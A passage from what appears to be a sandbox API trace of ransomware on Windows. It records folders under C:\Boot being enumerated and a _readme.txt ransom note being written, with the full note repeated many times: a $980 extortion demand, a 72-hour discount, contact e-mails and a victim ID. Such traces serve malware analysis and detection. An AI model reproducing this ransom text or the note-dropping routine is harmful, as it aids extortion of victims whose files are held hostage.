returned 1 [0093.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.830] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0093.830] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.830] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.830] PathFindFileNameW (pszPath="") returned="" [0093.830] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.831] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.831] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x335e120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.831] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x335e120 | out: hHeap=0x630000) returned 1 [0093.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.831] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0093.831] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.831] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.831] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0093.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0093.832] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0093.832] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0093.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0093.832] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0093.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0093.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0093.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0093.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0093.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0093.833] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0093.833] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0093.835] CloseHandle (hObject=0x5c8) returned 1 [0093.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0093.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0093.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0093.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.835] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa179a960, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa179a960, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0093.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.835] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa179a960, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa179a960, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.835] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.835] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa179a960, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa179a960, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa179a960, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.835] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa179a960, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa179a960, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa179a960, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.836] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0093.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0093.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0093.836] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.838] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0093.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.838] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.838] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.838] PathFindFileNameW (pszPath="") returned="" [0093.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.838] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.839] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x335e120 [0093.839] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x335e120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b79750 [0093.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.839] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.839] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0093.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.839] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0093.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0093.840] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0093.840] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video 